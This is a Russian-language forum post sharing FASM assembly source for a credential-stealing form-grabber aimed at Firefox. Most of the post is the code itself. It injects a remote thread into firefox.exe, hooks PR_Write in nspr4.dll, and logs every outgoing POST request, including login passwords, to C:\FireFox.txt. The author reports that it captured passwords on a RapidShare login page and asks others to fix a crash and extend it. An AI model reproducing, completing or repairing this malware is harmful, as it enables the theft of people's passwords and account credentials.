Короч меня за*бло. Кто хотит модифируйте код.
Компилить Fasm 1.68. Работает так:
Перехватывает PR_Write из библы nspr4. Берёт два параметра. Если во втором параметре есть "POST" то записывает запрос в файл C:\FireFox.txt тетстил на hxxps://ssl.rapidshare.com/premiumzone.html пароли скидываются в файл. Но потом ФФ рушиться. Идеи?
Кому сорец понравился +)
Код:
format PE GUI 4.0
entry start
macro PushArg [Arg]{
reverse push Arg
}
include 'D:\INCLUDE\win32a.inc'
include 'D:\INCLUDE\ddk\myincs.inc'
include 'D:\INCLUDE\MACRO\IF.inc'
TH32CS_SNAPPROCESS = 2
section '.code' code readable writeable executable
target_name db 'firefox.exe',0
;...............[INJECT CODE]..................;
remote_thread:
call delta
delta:
pop ebp;
sub ebp,delta
jmp First
struct restoreq
first db ?
second dd ?
ProcAddr dd ?
ends
;BaseAddr dd ?
KernelBase dd ?
GPAcall dd ?
GMHcall dd ?
HUser32 dd ?
MSBox dd ?
VirtProt dd ?
old db ?
HMod dd ?
GetLastErrorCall dd ?
MSBoxRest restoreq ?,?,?
PR_WriteRest restoreq ?,?,?
hFile dd ?
flbytes dd ?
flbytesend dd ?
CreateFileCall dd ?
SetFilePointerCall dd ?
WriteFileCall dd ?
CloseHandleCall dd ?
; Temp dd ?
BackAddr dd ?
resalt dd ?
esprest dd ?
ecxrest dd ?
edxrest dd ?
ebxrest dd ?
edirest dd ?
esirest dd ?
ebprest dd ?
dataadr dd ?
datalen dd ?
First:
;Kernel Base ->
xor eax,eax
mov eax,[fs:eax+30h]
mov eax,[eax+0ch]
mov esi,[eax+1ch]
lodsd
mov eax,[eax+08h]
mov [KernelBase+ebp],eax
;Kernel Export ->
mov edi,eax
add edi,[eax+3ch]; NTHeader
add edi,78h; DataDirectory
mov esi,[edi]
add eax,esi
;Addres of GetProcAddress in [GPA]
mov ebx,[eax+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
add ebx,[KernelBase+ebp]
mov edx,1
_find:
push ebx
mov ecx,14
mov eax,[ebx]
add eax,[KernelBase+ebp]
mov esi,eax
lea edi,[GPA+ebp]
cld
repe cmpsb
jz _ok
pop ebx
add ebx,4
inc edx
jmp _find
_ok:
xor eax,eax
mov eax,[KernelBase+ebp]
;Kernel Export ->
mov edi,eax
add edi,[eax+3ch]; NTHeader
add edi,78h; DataDirectory
mov esi,[edi]
add eax,esi
;---
mov ebx,[eax+IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals]
add ebx,[KernelBase+ebp]
shl edx,1
add ebx,edx
mov edx,[ebx]
movzx ebx,dx
;------------
sub ebx,1
shl ebx,2
mov eax,[eax+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
add eax,[KernelBase+ebp]
add eax,ebx
mov ecx,[eax]
add ecx,[KernelBase+ebp]
mov [GPAcall+ebp],ecx
pop ecx
;----------------End Get Address of GetProcAddress--------
lea ecx,[GMH+ebp]
lea edx,[KernelBase+ebp]
mov edx,[edx]
push ecx
push edx
call [GPAcall+ebp]
mov [GMHcall+ebp],eax
;-------------End Get Address of GetModuleHanle--------
mov ecx,USER32
call GetModHandle
mov [HUser32+ebp],eax
;----------------- Handle of User32.dll ----------------
mov ecx,VirtualProt
mov eax,KernelBase
call GetAddr
mov [VirtProt+ebp],eax
;----------------- VirtualProtect -----------------
mov ecx,GetLastErrorStr
mov eax,KernelBase
call GetAddr
mov [GetLastErrorCall+ebp],eax
;----------------- GetLastErorr ----------------
mov ecx,CreateFileStr
mov eax,KernelBase
call GetAddr
mov [CreateFileCall+ebp],eax
;---------------- CreatFileA ---------------------
mov ecx,SetFilePointerStr
mov eax,KernelBase
call GetAddr
mov [SetFilePointerCall+ebp],eax
;----------------- SetFilePointer ------------------
mov ecx,WriteFileStr
mov eax,KernelBase
call GetAddr
mov [WriteFileCall+ebp],eax
;------------------ WriteFile -------------------
mov ecx,CloseHandleStr
mov eax,KernelBase
call GetAddr
mov [CloseHandleCall+ebp],eax
;---------------------- CloseHandle ----------------------
push NPR
push PR_WriteStr
push nspr4
push PR_WriteRest
call HookAPI
; mov ecx,MessBox
; mov eax,HUser32
; call GetAddr
; mov [MSBox+ebp],eax ;MSBoxA addr
; push nPR_Write
; push MessBox
; push USER32
; push MSBoxRest
; call HookAPI
; push MSBoxRest
; call UnHookAPI
; PushArg 0,0,0,0
; call [MSBox+ebp]
; lea ecx,[Namef+ebp]
; push ecx
; push 7
; call WriteToFile
ret
NPR:
mov eax,[esp]
push ebp
call delta12
delta12:
pop ebp;
sub ebp,delta12
mov [BackAddr+ebp],eax
pop eax ;ebp
mov [ebprest+ebp],eax
mov [ecxrest+ebp],ecx
mov [ebxrest+ebp],ebx
mov [edxrest+ebp],edx
mov [edirest+ebp],edi
mov [esirest+ebp],esi
mov eax,[esp+0x08];addr of post
.if dword [eax]<>'POST'
jmp NoWork
.endif
;--------------Our Code-----------
;mov [dataadr+ebp],eax
;mov eax,[esp+0x0C]
;mov [datalen+ebp],eax
push eax
mov eax,[esp+0x10];size of data
push eax
call WriteToFile
;--------------Our Code-----------
NoWork:
lea esp,[esp+4]
rep1:
push PR_WriteRest
call UnHookAPI
mov edx,[edxrest+ebp]
mov ebx,[ebxrest+ebp]
mov edi,[edirest+ebp]
mov esi,[esirest+ebp]
mov ecx,ebp
mov ebp,[ebprest+ecx]
mov ecx,[PR_WriteRest.ProcAddr+ecx]
call ecx
call deltax
deltax:
pop ebp;
sub ebp,deltax
mov [resalt+ebp],eax
mov [edxrest+ebp],edx
push NPR
push PR_WriteStr
push nspr4
push PR_WriteRest
call HookAPI
; mov esp,[esprest+ebp]
mov edx,[edxrest+ebp]
mov ebx,[ebxrest+ebp]
mov edi,[edirest+ebp]
mov esi,[esirest+ebp]
mov ecx,ebp
; lea esp,[esp+4]
mov eax,[resalt+ecx]
mov ebp,[ebprest+ecx]
mov ecx,[BackAddr+ecx]
jmp ecx
GetModHandle: ;ecx-module name
lea ecx,[ecx+ebp]
push ecx
call [GMHcall+ebp]
ret
GetAddr: ;ecx-Func Name, eax-Handle of module
lea ecx,[ecx+ebp]
push ecx
lea eax,[eax+ebp]
mov eax,[eax]
push eax
call [GPAcall+ebp]
ret
HookAPI:
pop edi ;ret addr
pop ebx ;restore data
pop ecx ;name module
call GetModHandle
mov [HMod+ebp],eax
mov eax,HMod
pop ecx;name func
call GetAddr
mov [ebx+restoreq.ProcAddr+ebp],eax
lea esi,[old+ebp]
invoke VirtProt+ebp,[ebx+restoreq.ProcAddr+ebp],5,PAGE_EXECUTE_READWRITE,esi
; call [GetLastErrorr+ebp]
; je BadEnd
pop edx; mov edx,[AddrNewProc]; addr my func
lea edx,[edx+ebp]
sub edx,[ebx+restoreq.ProcAddr+ebp]
sub edx,5
xchg eax,edx; jmp value eax
mov edx,[ebx+restoreq.ProcAddr+ebp]
mov ch,byte [edx]
mov [ebx+restoreq.first+ebp],ch
push dword [edx+1]
pop [ebx+restoreq.second+ebp]
mov byte [edx],$E9
mov dword [edx+1],eax
invoke VirtProt+ebp,[ebx+restoreq.ProcAddr+ebp],5,[esi],esi
HookEnd:
jmp edi
BadEnd:
leave
jmp HookEnd
UnHookAPI:
pop edi
pop ebx
lea esi,[old+ebp]
invoke VirtProt+ebp,[ebx+restoreq.ProcAddr+ebp],5,PAGE_EXECUTE_READWRITE,esi
; call [GetLastErrorCall+ebp]
je BadEndUn
lea ecx,[ebx+restoreq.ProcAddr+ebp]
mov ecx,[ecx]
mov dh,[ebx+restoreq.first+ebp]
mov [ecx],dh
mov edx,[ebx+restoreq.second+ebp]
mov [ecx+1],edx
invoke VirtProt+ebp,[ebx+restoreq.ProcAddr+ebp],5,[esi],esi
BadEndUn:
jmp edi;
WriteToFile:
pop edi
lea edx,[Namef+ebp]
invoke CreateFileCall+ebp,edx,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ,0h,CREATE_NEW or OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0h
; call [GetLastErrorCall+ebp]
mov [hFile+ebp],eax
invoke SetFilePointerCall+ebp,[hFile+ebp],0,0,FILE_END
AgainWrite:
lea edx,[flbytes+ebp]
pop ebx;size buff
pop ecx; addr buff
invoke WriteFileCall+ebp,[hFile+ebp],ecx,ebx,edx,0h
lea ecx,[EndLine+ebp]
lea edx,[flbytesend+ebp]
invoke WriteFileCall+ebp,[hFile+ebp],ecx,1,edx,0h
lea edx,[hFile+ebp]
invoke CloseHandleCall+ebp,[edx]
jmp edi
EndLine db 0x0A,0
PR_WriteStr db 'PR_Write',0
nspr4 db 'nspr4.dll',0
Namef db 'C:\FireFox.txt',0
CloseHandleStr db 'CloseHandle',0
WriteFileStr db 'WriteFile',0
SetFilePointerStr db 'SetFilePointer',0
CreateFileStr db 'CreateFileA',0
GPA db 'GetProcAddress',0
GMH db 'GetModuleHandleA',0
MessBox db 'MessageBoxA',0
USER32 db 'user32.dll',0
VirtualProt db 'VirtualProtect',0
GetLastErrorStr db 'GetLastError',0
thread_end:
;...............[END INJECT CODE]..............;
p_ent PROCESSENTRY32
find_target:
xor esi,esi
.shot:
mov [p_ent.dwSize],sizeof.PROCESSENTRY32
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,esi
inc eax
je .not_found
dec eax
xchg eax,edi
invoke Process32First,edi,p_ent
.next_prc:
xchg eax,ecx
jecxz .not_found
invoke lstrcmpi,p_ent.szExeFile,target_name
xchg eax,ecx
jecxz .found
invoke Process32Next,edi,p_ent
jmp .next_prc
.found:
invoke CloseHandle,edi
mov eax,[p_ent.th32ProcessID]
ret
.not_found:
xor eax,eax
ret
inject_code:
xor esi,esi
invoke OpenProcess,PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,esi,eax
xchg eax,ecx
jecxz .exit
xchg ecx,edi
invoke VirtualAllocEx,edi,esi,thread_end-remote_thread,MEM_COMMIT,PAGE_READWRITE
xchg eax,ecx
jecxz .close_h
xchg ecx,ebp
invoke WriteProcessMemory,edi,ebp,remote_thread,thread_end-remote_thread,esi
dec eax
test eax,eax
jnz .close_h
inc eax
invoke CreateRemoteThread,edi,esi,esi,ebp,ebp,esi,esi
.close_h:
invoke CloseHandle,edi
.exit:
ret
get_apis:
; mov edi,[LoadLibrary]
; mov [pLoadLibrary],edi
; mov edi,[MessageBox]
; mov [pMessageBox],edi
ret
start:
call find_target
test eax,eax
je .exit
call get_apis
call inject_code
.exit:
push 0
call [ExitProcess]
section '.idata' data import readable
library kernel32,'KERNEL32.DLL',\
user32,'USER32.DLL'
include 'D:\INCLUDE\API\kernel32.inc'
include 'D:\INCLUDE\API\user32.inc'
Что посоветуете почитать ? |
